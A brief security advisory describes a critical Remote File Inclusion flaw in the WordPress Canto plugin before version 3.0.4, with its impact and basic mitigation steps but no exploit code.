A Remote File Inclusion (RFI) vulnerability has been identified in the WordPress Canto Plugin. This vulnerability allows an attacker to get a website to load an external website or script, which will then be executed on the website. This could allow the malicious actor to create backdoors on the site or take full control of the website.

Marco Wotschka discovered and reported this vulnerability, highlighting the urgent need for attention.

The vulnerability is a Remote File Inclusion (RFI) vulnerability that occurs in the canto.php file. The vulnerability allows an attacker to include an external file by specifying a specially crafted URL in the file parameter of the get_file function.


The vulnerability has a CVSS 3.1 score of 9.8, which is considered to be critical. This means that the vulnerability is highly exploitable and could have a significant impact on the affected system.

Affected Versions:

The vulnerability affects all versions of the Canto Plugin prior to 3.0.4.


An attacker who successfully exploits this vulnerability could:

  • Create backdoors on the website
  • Take full control of the website
  • Steal sensitive data from the website
  • Disrupt the website’s operations


Given the gravity of this vulnerability, immediate action is essential to protect the WordPress website:

  1. Disable Plugin: Users of the Canto Plugin are strongly advised to uninstall the plugin until a patched version is available.
  2. Stay Updated: Keep an eye out for official updates or advisories related to the Canto Plugin. Stay informed about any potential patches or fixes that may be released.
  3. Enhance Security Measures: Secure the website’s security measures by applying strong authentication protocols, access controls, and regular security audits.